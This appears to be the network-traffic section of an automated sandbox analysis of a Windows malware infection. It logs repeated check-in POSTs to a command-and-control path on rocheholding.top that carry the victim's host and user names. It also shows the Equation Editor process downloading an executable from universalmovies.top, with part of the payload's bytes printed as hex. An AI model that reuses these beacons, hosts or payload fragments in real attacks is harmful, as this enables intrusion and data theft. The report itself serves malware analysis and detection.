May 23, 2024 20:19:12.451481104 CEST	625	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VKNJmiDleFRWiJoza%2FFCTw4zc29t8azsk4PWe23kgI%2FwR6AFjYNTaMv9MQddllIKuUkJ7ltUjc%2FXV2Z4Nn0YLi5lrXFvvfm%2Bvvgko2kNV3gPlJcrVgxuQGeEfTWeVjHXtgNw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d8879d772a1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.22	49255	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:12.597934008 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:12.652106047 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:13.233325958 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSWxdqYs4qQ2zDwUAPEX6RazmvRs%2BDt1Xo%2FC3%2F1iC3QidnS4xfMAqb%2FG4PiXOC2BIa%2Bg5gjfn%2FCxpJvR1KkvNXFqoHCTuhk6hf3uMPTXR0XIHmIgUe0tww3UJNzojNrFtqU1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d8e7f1d8c1e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.22	49256	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:13.398916960 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:13.447422981 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:14.112435102 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xce5oZfMpJRGsmJNSnq6%2B4TxB2N0J3wvjE9muGZwpfbM3EL9pNCBN1CfG5M9ubqlOTYkuK%2Bhw3e4jUen%2F%2FhbtfaiX6U%2FjJ5bS9p0hInJzIhX8p%2FFwNmPea2KuqqPjU1Ms8WV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d934f7fc46d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.22	49257	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:14.278026104 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:14.327351093 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:14.904860973 CEST	627	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDWKhb4y48HkO2eV477ic%2BPQ3TNoEdUAz%2FeyPDwYK9FFbqRb3o9wOfxBH587hBJpOswpKBZdrzXL%2FozFoAZfR8Vglx5X9xMNCnlmR6p8G4pUbd6Ed%2ByMdIxc2i%2FiGnYmwtnd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d98dcbd43c2-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.22	49258	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:15.184596062 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:15.236584902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:15.842974901 CEST	619	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4A3w6EhOrGlHxkDf1fljwTAe9K1CA6Fj14fuL8t1bO4BuQ4CqRk1MbUBzYhjyJYaw6eEnMcfEiorIYXkSdNGwrl5UYfAmJ846yTzapNXLfC0VvoDW1cNkB%2FGI16Ell0Cxdd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870d9ebf350f7d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.22	49259	188.114.97.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:16.005968094 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:16.055433035 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:16.725969076 CEST	631	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfH%2F2BVpjSen2eyktv1BYCPUDFXtQxn3KpP4F9EwmF%2FpGNJP2lvbmrqIFTdvNpzHn%2FBGQTrQ%2B0xCYfbEmd%2BFuH1ZDtC6xk%2Ba1bxlgSfloXz3%2BWCmJCVyI5dcMleVAFZYoG19"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870da3a9d48c75-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.22	49260	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:16.882044077 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:16.932179928 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:17.508523941 CEST	629	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFhwP2H%2BOS5aCEOLuYOThMMa498qI5eWf%2F2BIAL1yiv305Hw2OBPHrpxDwvW4BkBMFGYJ5FrrQU3pkrBQ%2FGu75qS0HnDCSqOaLgZlfCr5YxGUkSfVMA9mYI%2Fqq%2BFaN7NnmOR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870da92fb77288-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.22	49261	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:17.653378963 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:17.709537983 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
May 23, 2024 20:19:18.284159899 CEST	623	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 18:19:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1k06TqmMpfmAdQ55cmQPUDY0UHc8UvEa%2FqwjX4bImXFfZsrXLkcVsGptiCFg5xqG128v6YYH%2F7IUm5HHJiX3MDbv8QxFpcWAHiFmQEh%2BJlGNSxMcEZKxTaDeGCXTbK982PN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88870dadfe3641ed-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.22	49262	188.114.96.3	80	3376	C:\Users\user\AppData\Roaming\sharon38892.exe

Timestamp	Bytes transferred	Direction	Data
May 23, 2024 20:19:18.441020966 CEST	247	OUT	POST /evie3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: rocheholding.top Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 21507074 Content-Length: 149 Connection: close
May 23, 2024 20:19:18.492275000 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	104.21.74.191	443	2740	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
2024-05-23 18:17:25 UTC	318	OUT	GET /sharonzx.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: universalmovies.top Connection: Keep-Alive
2024-05-23 18:17:26 UTC	845	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 18:17:25 GMT Content-Type: application/octet-stream Content-Length: 771592 Connection: close Last-Modified: Thu, 23 May 2024 00:58:34 GMT ETag: "664e94ba-bc608" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 CF-Cache-Status: HIT Age: 39321 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbcLgZPPlpfozJC4jbbX5D1ZA7QbeeetcLreAH7Ansre%2BwzPcbxOz2LXFVsOd8ew%2Bs9l718X2ERTcxLSPXBxJxechtooSCAao0MPwqv26X%2BDRx0PZK2Jks9C9qti0F05T4b3UjJe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=0; includeSubDomains; preload X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 88870af14f4f4345-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 18:17:26 UTC	524	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 96 46 84 84 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 84 0b 00 00 0a 00 00 00 00 00 00 6e a2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELF0n @ @
2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 02 00 05 00 c0 65 00 00 74 f4 04 00 03 00 00 00 1a 00 00 06 34 5a 05 00 f0 2b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 4c 00 00 00 01 00 00 11 02 17 7d 02 00 00 04 02 28 1d 00 00 0a 00 00 02 28 1e 00 00 0a 00 02 28 10 00 00 06 00 02 fe 06 12 00 00 06 73 1f 00 00 0a 0a 02 28 20 00 00 0a 06 6f 21 00 00 0a 00 02 28 22 00 00 0a 06 6f 23 00 00 0a 00 02 28 24 00 00 0a 00 2a 13 30 04 00 89 01 00 00 02 00 00 11 02 17 7d 02 00 00 04 02 03 04 16 28 25 00 00 0a 00 00 02 03 04 28 26 00 00 0a 0c 08 2c 35 00 02 16 28 0f 00 00 06 00 02 fe 06 12 00 00 06 73 1f 00 00 0a 0d 02 28 06 00 00 06 09 6f 21 00 00 0a 00 02 28 07 00 00 06 09 6f 23 00 00 0a 00 38 35 01 00 00 03 72 01 00 Data Ascii: et4Z+0L}(((s( o!("o#($*0}(%(&,5(s(o!(o#85r
2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 00 00 0a 09 6f 4f 00 00 0a 26 07 08 6f 50 00 00 0a 00 06 6f 51 00 00 0a 13 04 02 11 04 6f 52 00 00 0a 6f 53 00 00 0a 13 05 11 05 39 11 01 00 00 00 73 43 00 00 0a 13 06 73 43 00 00 0a 13 07 00 14 13 08 11 04 11 06 6f 54 00 00 0a 00 02 11 04 6f 52 00 00 0a 6f 55 00 00 0a 6f 56 00 00 0a 13 09 38 9a 00 00 00 00 11 09 6f 57 00 00 0a 74 1f 00 00 01 13 08 11 07 16 6a 6f 58 00 00 0a 00 11 08 11 07 6f 54 00 00 0a 00 11 06 6f 59 00 00 0a 11 07 6f 59 00 00 0a fe 01 13 0a 11 0a 2c 60 00 11 06 16 6a 6f 46 00 00 0a 00 11 07 16 6a 6f 46 00 00 0a 00 2b 03 00 00 00 11 06 6f 5a 00 00 0a 11 06 6f 59 00 00 0a 2e 12 11 06 6f 5b 00 00 0a 11 07 6f 5b 00 00 0a fe 01 2b 01 16 13 0b 11 0b 2d d4 11 06 6f 5a 00 00 0a 11 06 6f 59 00 00 0a fe 01 13 0c 11 0c 2c 06 00 07 13 0d de 51 00 Data Ascii: oO&oPoQoRoS9sCsCoToRoUoV8oWtjoXoToYoY,`joFjoF+oZoY.o[o[+-oZoY,Q
2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 26 00 00 0a 0c 08 2c 35 00 02 16 28 29 00 00 06 00 02 fe 06 2c 00 00 06 73 1f 00 00 0a 0d 02 28 20 00 00 06 09 6f 21 00 00 0a 00 02 28 21 00 00 06 09 6f 23 00 00 0a 00 38 35 01 00 00 03 72 01 00 00 70 d0 53 00 00 01 28 27 00 00 0a 6f 28 00 00 0a 74 53 00 00 01 0a 02 03 04 28 29 00 00 0a 17 fe 01 13 04 11 04 39 c2 00 00 00 00 73 1d 00 00 0a 13 05 11 05 06 73 2a 00 00 0a 73 2b 00 00 0a 6f 2c 00 00 0a 00 11 05 6f 20 00 00 0a 72 15 00 00 70 6f 2d 00 00 0a 14 fe 03 13 06 11 06 2c 24 00 02 28 20 00 00 0a 11 05 6f 20 00 00 0a 72 15 00 00 70 6f 2d 00 00 0a 73 7d 00 00 06 6f 2e 00 00 0a 00 00 02 11 05 6f 2f 00 00 0a 28 30 00 00 0a 00 02 11 05 6f 31 00 00 0a 28 32 00 00 0a 00 02 11 05 6f 33 00 00 0a 28 34 00 00 0a 00 02 11 05 6f 35 00 00 0a 28 36 00 00 0a 00 02 11 Data Ascii: &,5(),s( o!(!o#85rpS('o(tS()9ss*s+o,o rpo-,$( o rpo-s}o.o/(0o1(2o3(4o5(6
2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 00 0a 11 06 6f 59 00 00 0a 2e 12 11 06 6f 5b 00 00 0a 11 07 6f 5b 00 00 0a fe 01 2b 01 16 13 0b 11 0b 2d d4 11 06 6f 5a 00 00 0a 11 06 6f 59 00 00 0a fe 01 13 0c 11 0c 2c 06 00 07 13 0d de 51 00 00 11 09 6f 5c 00 00 0a 13 0e 11 0e 3a 56 ff ff ff 00 de 2d 00 11 06 14 fe 03 13 0f 11 0f 2c 0a 00 11 06 6f 5d 00 00 0a 00 00 11 07 14 fe 03 13 10 11 10 2c 0a 00 11 07 6f 5d 00 00 0a 00 00 00 dc 00 02 11 04 6f 5e 00 00 0a 26 07 13 0d 2b 00 11 0d 2a 00 01 10 00 00 02 00 68 00 d4 3c 01 2d 00 00 00 00 26 02 28 90 00 00 0a 00 00 2a 00 00 13 30 02 00 39 00 00 00 13 00 00 11 00 7e 0a 00 00 04 14 fe 01 0a 06 2c 22 00 72 f0 9c 04 70 d0 06 00 00 02 28 27 00 00 0a 6f 91 00 00 0a 73 92 00 00 0a 0b 07 80 0a 00 00 04 00 7e 0a 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 Data Ascii: oY.o[o[+-oZoY,Qo\:V-,o],o]o^&+h<-&(09~,"rp('os~+*0
2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 1e 00 00 04 02 7b 0e 00 00 04 6f b2 00 00 0a 00 02 7b 17 00 00 04 6f b2 00 00 0a 00 02 7b 1e 00 00 04 6f b2 00 00 0a 00 02 28 6b 00 00 0a 00 02 7b 0e 00 00 04 28 b3 00 00 0a 6f 6d 00 00 0a 00 02 7b 0e 00 00 04 16 16 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 0e 00 00 04 72 02 9e 04 70 6f 70 00 00 0a 00 02 7b 0e 00 00 04 20 05 02 00 00 20 fe 01 00 00 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 0e 00 00 04 17 6f b4 00 00 0a 00 02 7b 0e 00 00 04 16 6f b5 00 00 0a 00 02 7b 0e 00 00 04 16 6f b6 00 00 0a 00 02 7b 0f 00 00 04 72 1a 9e 04 70 22 00 00 40 41 17 73 b7 00 00 0a 6f b8 00 00 0a 00 02 7b 0f 00 00 04 28 b9 00 00 0a 6f 9b 00 00 0a 00 02 7b 0f 00 00 04 20 2e 02 00 00 1f 37 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 0f 00 00 04 72 4a 9d 04 70 6f 70 00 00 0a 00 02 7b 0f Data Ascii: {o{o{o(k{(om{snoo{rpop{ sqor{o{o{o{rp"@Aso{(o{ .7snoo{rJpop{
2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 17 6f bd 00 00 0a 00 02 7b 16 00 00 04 72 1a 9e 04 70 22 00 00 40 41 17 73 b7 00 00 0a 6f b8 00 00 0a 00 02 7b 16 00 00 04 20 97 02 00 00 20 c6 01 00 00 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 16 00 00 04 72 54 9f 04 70 6f 70 00 00 0a 00 02 7b 16 00 00 04 20 ab 00 00 00 1f 2b 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 16 00 00 04 1e 6f 73 00 00 0a 00 02 7b 16 00 00 04 72 64 9f 04 70 6f 87 00 00 0a 00 02 7b 16 00 00 04 16 6f be 00 00 0a 00 02 7b 16 00 00 04 02 fe 06 38 00 00 06 73 76 00 00 0a 6f bf 00 00 0a 00 02 7b 17 00 00 04 28 bb 00 00 0a 6f bc 00 00 0a 00 02 7b 17 00 00 04 20 c3 03 00 00 1f 0c 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 17 00 00 04 72 6e 9f 04 70 6f 70 00 00 0a 00 02 7b 17 00 00 04 1f 1e 1f 1c 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 17 00 00 04 Data Ascii: o{rp"@Aso{ snoo{rTpop{ +sqor{os{rdpo{o{8svo{(o{ snoo{rnpop{sqor{
2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 20 00 01 00 00 14 73 c8 00 00 0a a2 6f c7 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1c 00 00 04 6f ca 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1a 00 00 04 6f cb 00 00 0a 00 02 7b 1d 00 00 04 02 7b 18 00 00 04 6f cc 00 00 0a 00 02 7b 1d 00 00 04 6f cd 00 00 0a 17 8d 92 00 00 01 25 16 72 45 a3 04 70 72 15 00 00 70 1d 8d 93 00 00 01 25 16 72 68 9d 04 70 72 68 9d 04 70 73 ce 00 00 0a a2 25 17 72 7c 9d 04 70 72 7c 9d 04 70 73 ce 00 00 0a a2 25 18 72 90 9d 04 70 72 90 9d 04 70 73 ce 00 00 0a a2 25 19 72 a2 9d 04 70 72 a2 9d 04 70 73 ce 00 00 0a a2 25 1a 72 5c 9d 04 70 72 5c 9d 04 70 73 ce 00 00 0a a2 25 1b 72 4a 9d 04 70 72 4a 9d 04 70 73 ce 00 00 0a a2 25 1c 72 bc 9d 04 70 72 bc 9d 04 70 73 ce 00 00 0a a2 73 cf 00 00 0a a2 6f d0 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1b 00 Data Ascii: so{{o{{o{{o{o%rEprp%rhprhps%r\|pr\|ps%rprps%rprps%r\pr\ps%rJprJps%rprpsso{{
2024-05-23 18:17:26 UTC	1369	IN	Data Raw: 00 00 0a 00 02 7b 21 00 00 04 20 2e 02 00 00 20 99 00 00 00 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 21 00 00 04 72 bb a3 04 70 6f 70 00 00 0a 00 02 7b 21 00 00 04 20 8c 01 00 00 1f 1e 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 21 00 00 04 17 6f 73 00 00 0a 00 02 7b 21 00 00 04 72 cd a3 04 70 6f 87 00 00 0a 00 02 7b 21 00 00 04 02 fe 06 40 00 00 06 73 76 00 00 0a 6f ba 00 00 0a 00 02 7b 22 00 00 04 72 1a 9e 04 70 22 00 00 40 41 17 19 16 73 d4 00 00 0a 6f b8 00 00 0a 00 02 7b 22 00 00 04 28 d5 00 00 0a 6f 9b 00 00 0a 00 02 7b 22 00 00 04 20 2e 02 00 00 20 0f 01 00 00 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 22 00 00 04 72 e9 a3 04 70 6f 70 00 00 0a 00 02 7b 22 00 00 04 20 8c 01 00 00 1f 1e 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 22 00 00 04 18 6f 73 00 00 0a 00 02 Data Ascii: {! . snoo{!rpop{! sqor{!os{!rpo{!@svo{"rp"@Aso{"(o{" . snoo{"rpop{" sqor{"os
